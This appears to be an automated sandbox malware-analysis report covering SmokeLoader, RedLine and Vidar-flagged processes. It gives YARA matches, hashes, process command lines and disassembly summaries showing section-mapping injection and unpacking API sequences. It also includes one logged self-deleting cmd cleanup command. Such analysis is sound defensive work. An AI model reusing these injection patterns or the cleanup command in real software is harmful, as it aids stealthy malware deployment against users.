                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1650939985.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.1651356917.0000000002441000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.1650874294.00000000020C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1651023063.0000000002203000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 29%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:09:23:34
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\5876.exe
                                                            Imagebase:0x400000
                                                            File size:325'120 bytes
                                                            MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.2152715201.0000000002120000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.2152378881.000000000079D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            Antivirus matches:
                                                            • Detection: 100%, Avira
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 92%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:09:24:05
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\EE6.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\EE6.exe
                                                            Imagebase:0x400000
                                                            File size:1'986'560 bytes
                                                            MD5 hash:2095273C7B526065D7094738AA070E1B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:Borland Delphi
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 0000000B.00000002.2056003216.0000000004279000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000B.00000002.2056487759.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 0000000B.00000002.2056395871.0000000004470000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.2056003216.0000000004170000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:09:24:08
                                                            Start date:27/05/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            Imagebase:0x400000
                                                            File size:881'664 bytes
                                                            MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000C.00000002.2536713004.0000000000929000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 4%, ReversingLabs
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:09:24:12
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7992 -s 468
                                                            Imagebase:0x290000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:09:24:56
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\katDDA4.tmp" & rd /s /q "C:\ProgramData\FBGIDHCAAKEB" & exit
                                                            Imagebase:0xa40000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:09:24:56
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:09:24:56
                                                            Start date:27/05/2024
                                                            Path:C:\Windows\SysWOW64\timeout.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:timeout /t 10
                                                            Imagebase:0x320000
                                                            File size:25'088 bytes
                                                            MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true


                                                              Execution Graph

                                                              Execution Coverage:8.6%
                                                              Dynamic/Decrypted Code Coverage:17.6%
                                                              Signature Coverage:40.6%
                                                              Total number of Nodes:165
                                                              Total number of Limit Nodes:7

                                                              Control-flow Graph

                                                              APIs
                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                              • InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                              • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                              • ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                              • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                              • RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • FileTimeToSystemTime.KERNEL32(00000000,00000000), ref: 0040BEDB
                                                              • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BEE5
                                                              • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0040BEED
                                                              • GetFileAttributesW.KERNEL32(00423138), ref: 0040BEF8
                                                              • CompareStringW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040BF0A
                                                              • ActivateActCtx.KERNEL32(00000000,00000000), ref: 0040BF12
                                                                • Part of subcall function 0040BA54: GetModuleHandleW.KERNEL32(0042310C,0040BF7A), ref: 0040BA59
                                                                • Part of subcall function 0040BA54: GetProcAddress.KERNEL32(00000000,00423128), ref: 0040BA65
                                                              • LoadLibraryA.KERNELBASE(004231E4), ref: 0040BFCC
                                                              • EnumTimeFormatsW.KERNEL32(00000000,00000000,00000000), ref: 0040C028
                                                              • GetProcessHeaps.KERNEL32(00000000,00000000), ref: 0040C046
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: File$Time$ConsoleInterlockedModule$ActivateAddressAllocAtomAttributesCalendarCompareCriticalDeleteEntryEnumExceptionExchangeFormatsHandleHeapsInfoInitLibraryListLoadLocalModeNameOutputProcProcessRaiseReadScatterSectionStringSystemTableWrite
                                                              • String ID: k`$tl_$}$
                                                              • API String ID: 2790545399-211918992
                                                              • Opcode ID: 62ebdbc1345a9830f6c3b71613122af7ca7e2f41f5a114459fff0b3f35dfb333
                                                              • Instruction ID: 983014b9c3dec96d1e327b941389972c90706ee8dc4b42e0b9954b56a4e297c8
                                                              • Opcode Fuzzy Hash: 62ebdbc1345a9830f6c3b71613122af7ca7e2f41f5a114459fff0b3f35dfb333
                                                              • Instruction Fuzzy Hash: 817172B5900218AED720AFB5DD84D6B76BCFB08348F00547AF549F2166DB388D45CFA8

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                              • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                              • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65

                                                              Control-flow Graph

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0
                                                              • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                              • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                              • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65

                                                              Control-flow Graph

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$CreateDuplicateObjectView
                                                              • String ID:
                                                              • API String ID: 1652636561-0
                                                              • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                              • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                              • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24

                                                              Control-flow Graph

                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0

                                                              Control-flow Graph

                                                              control_flow_graph 344 401620-401632 347 401643 344->347 348 401639-401670 call 4012a9 344->348 347->348 355 401672 348->355 356 401675-40167a 348->356 355->356 358 401680-401691 356->358 359 401991-401999 356->359 363 401697-4016c0 358->363 364 40198f 358->364 359->356 362 40199e-4019e0 call 4012a9 359->362 363->364 372 4016c6-4016dd NtDuplicateObject 363->372 364->362 372->364 374 4016e3-401707 NtCreateSection 372->374 376 401763-401789 NtCreateSection 374->376 377 401709-40172a NtMapViewOfSection 374->377 376->364 379 40178f-401793 376->379 377->376 378 40172c-401748 NtMapViewOfSection 377->378 378->376 381 40174a-401760 378->381 379->364 382 401799-4017ba NtMapViewOfSection 379->382 381->376 382->364 384 4017c0-4017dc NtMapViewOfSection 382->384 384->364 387 4017e2 call 4017e7 384->387
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0

                                                              Control-flow Graph

                                                              control_flow_graph 390 401658-401670 call 4012a9 394 401672 390->394 395 401675-40167a 390->395 394->395 397 401680-401691 395->397 398 401991-401999 395->398 402 401697-4016c0 397->402 403 40198f 397->403 398->395 401 40199e-4019e0 call 4012a9 398->401 402->403 411 4016c6-4016dd NtDuplicateObject 402->411 403->401 411->403 413 4016e3-401707 NtCreateSection 411->413 415 401763-401789 NtCreateSection 413->415 416 401709-40172a NtMapViewOfSection 413->416 415->403 418 40178f-401793 415->418 416->415 417 40172c-401748 NtMapViewOfSection 416->417 417->415 420 40174a-401760 417->420 418->403 421 401799-4017ba NtMapViewOfSection 418->421 420->415 421->403 423 4017c0-4017dc NtMapViewOfSection 421->423 423->403 426 4017e2 call 4017e7 423->426
                                                              APIs
                                                              • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                              • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                              • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                              • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                              • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: Section$View$Create$DuplicateObject
                                                              • String ID:
                                                              • API String ID: 1546783058-0

                                                              Control-flow Graph

                                                              control_flow_graph 429 215614a-2156163 430 2156165-2156167 429->430 431 215616e-215617a CreateToolhelp32Snapshot 430->431 432 2156169 430->432 433 215617c-2156182 431->433 434 215618a-2156197 Module32First 431->434 432->431 433->434 441 2156184-2156188 433->441 435 21561a0-21561a8 434->435 436 2156199-215619a call 2155e09 434->436 439 215619f 436->439 439->435 441->430 441->434
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02156172
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02156192
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419421544.0000000002153000.00000040.00000020.00020000.00000000.sdmp, Offset: 02153000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2153000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0

                                                              Control-flow Graph

                                                              control_flow_graph 54 211003c-2110047 55 2110049 54->55 56 211004c-2110263 call 2110a3f call 2110e0f call 2110d90 VirtualAlloc 54->56 55->56 71 2110265-2110289 call 2110a69 56->71 72 211028b-2110292 56->72 77 21102ce-21103c2 VirtualProtect call 2110cce call 2110ce7 71->77 74 21102a1-21102b0 72->74 76 21102b2-21102cc 74->76 74->77 76->74 83 21103d1-21103e0 77->83 84 21103e2-2110437 call 2110ce7 83->84 85 2110439-21104b8 VirtualFree 83->85 84->83 87 21105f4-21105fe 85->87 88 21104be-21104cd 85->88 91 2110604-211060d 87->91 92 211077f-2110789 87->92 90 21104d3-21104dd 88->90 90->87 95 21104e3-2110505 90->95 91->92 93 2110613-2110637 91->93 96 21107a6-21107b0 92->96 97 211078b-21107a3 92->97 98 211063e-2110648 93->98 108 2110517-2110520 95->108 109 2110507-2110515 95->109 99 21107b6-21107cb 96->99 100 211086e-21108be LoadLibraryA 96->100 97->96 98->92 102 211064e-211065a 98->102 101 21107d2-21107d5 99->101 107 21108c7-21108f9 100->107 104 2110824-2110833 101->104 105 21107d7-21107e0 101->105 102->92 106 2110660-211066a 102->106 114 2110839-211083c 104->114 111 21107e2 105->111 112 21107e4-2110822 105->112 113 211067a-2110689 106->113 115 2110902-211091d 107->115 116 21108fb-2110901 107->116 110 2110526-2110547 108->110 109->110 117 211054d-2110550 110->117 111->104 112->101 118 2110750-211077a 113->118 119 211068f-21106b2 113->119 114->100 120 211083e-2110847 114->120 116->115 122 21105e0-21105ef 117->122 123 2110556-211056b 117->123 118->98 124 21106b4-21106ed 119->124 125 21106ef-21106fc 119->125 126 2110849 120->126 127 211084b-211086c 120->127 122->90 128 211056d 123->128 129 211056f-211057a 123->129 124->125 130 211074b 125->130 131 21106fe-2110748 125->131 126->100 127->114 128->122 132 211059b-21105bb 129->132 133 211057c-2110599 129->133 130->113 131->130 138 21105bd-21105db 132->138 133->138 138->117
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0211024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691

                                                              Control-flow Graph

                                                              control_flow_graph 442 40c05d-40c070 call 40bd58 444 40c075-40c079 442->444 445 40c082-40c089 444->445 446 40c0a6 445->446 447 40c08b-40c0a4 SetLastError GetConsoleAliasesA 445->447 446->446 447->445
                                                              APIs
                                                                • Part of subcall function 0040BD58: LocalReAlloc.KERNEL32(00000000,00000000,00000000), ref: 0040BDCF
                                                                • Part of subcall function 0040BD58: InterlockedExchange.KERNEL32(?,00000000), ref: 0040BDF4
                                                                • Part of subcall function 0040BD58: RtlDeleteCriticalSection.NTDLL(?), ref: 0040BE01
                                                                • Part of subcall function 0040BD58: InitAtomTable.KERNEL32(00000000), ref: 0040BE08
                                                                • Part of subcall function 0040BD58: WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 0040BE49
                                                                • Part of subcall function 0040BD58: ReadFileScatter.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 0040BE6C
                                                                • Part of subcall function 0040BD58: GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 0040BE7B
                                                                • Part of subcall function 0040BD58: RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040BE85
                                                                • Part of subcall function 0040BD58: RtlInterlockedPopEntrySList.NTDLL(?), ref: 0040BE9E
                                                              • SetLastError.KERNEL32(00000000), ref: 0040C08D
                                                              • GetConsoleAliasesA.KERNEL32(?,00000000,00000000), ref: 0040C09E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: ConsoleFileInterlocked$AliasesAllocAtomCriticalDeleteEntryErrorExceptionExchangeInitLastListLocalModuleNameOutputRaiseReadScatterSectionTableWrite
                                                              • String ID:
                                                              • API String ID: 3667857532-0

                                                              Control-flow Graph

                                                              control_flow_graph 449 2110e0f-2110e24 SetErrorMode * 2 450 2110e26 449->450 451 2110e2b-2110e2c 449->451 450->451
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00000400,?,?,02110223,?,?), ref: 02110E19
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,02110223,?,?), ref: 02110E1E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1419284680.0000000002110000.00000040.00001000.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2110000_xvJv1BpknZ.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0

                                                              Control-flow Graph

                                                              control_flow_graph 452 40ba8b-40baa8 VirtualProtect
                                                              APIs
                                                              • VirtualProtect.KERNELBASE(00000040,?), ref: 0040BAA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418323999.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_40b000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0

                                                              Control-flow Graph

                                                              control_flow_graph 453 401a01-401a48 call 4012a9 Sleep call 401524 463 401a57-401aa7 call 4012a9 453->463 464 401a4a-401a52 call 401615 453->464 464->463
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0

                                                              Control-flow Graph

                                                              control_flow_graph 478 4019e3-401a48 call 4012a9 Sleep call 401524 493 401a57-401aa7 call 4012a9 478->493 494 401a4a-401a52 call 401615 478->494 494->493
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0

                                                              Control-flow Graph

                                                              control_flow_graph 508 4019ee-401a48 call 4012a9 Sleep call 401524 521 401a57-401aa7 call 4012a9 508->521 522 401a4a-401a52 call 401615 508->522 522->521
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1418280296.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_xvJv1BpknZ.jbxd
                                                              Similarity
                                                              • API ID: CreateDuplicateObjectSectionSleep
                                                              • String ID:
                                                              • API String ID: 4152845823-0
                                                              APIs
                                                              • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
